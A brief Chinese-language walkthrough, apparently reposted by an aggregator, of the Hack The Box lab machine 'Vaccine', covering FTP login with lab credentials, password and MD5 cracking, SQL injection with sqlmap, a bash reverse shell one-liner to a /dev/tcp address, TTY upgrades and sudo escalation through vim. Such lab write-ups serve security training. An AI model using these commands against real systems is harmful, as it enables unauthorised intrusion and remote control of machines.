[渗透测试]HTB靶机-Vaccine
Posted Y4tacker
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[渗透测试]HTB靶机-Vaccine相关的知识,希望对你有一定的参考价值。
文章目录
Vaccine
首先nmap -sC -sV 10.10.10.46
发现前台是一个登陆界面,尝试ftp登录ftpuser / mc@F1l3ZilL4
输入dir
拿到源码
尝试下载
通过爆破得到密码741852963
拿到源码
拿到2cb42f8734ea607eefed3b70af13bbd3
去尝试md5撞库
成功进入后台
发现存在sql注入
这里很容易猜测到如果是只通过sql那一定是通过udf提权,直接sqlmap一把梭
输入bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'
反弹shell成功
继续获取tty shell
SHELL=/bin/bash script -q /dev/null
在dashboard.php
发现了账户密码这个可以查看用户sudo特权指令
目标有python环境,可以直接在获得的shell中直接执行
python3 -c "import pty;pty.spawn('/bin/bash')"
并利用vim中执行shell命令
以上是关于[渗透测试]HTB靶机-Vaccine的主要内容,如果未能解决你的问题,请参考以下文章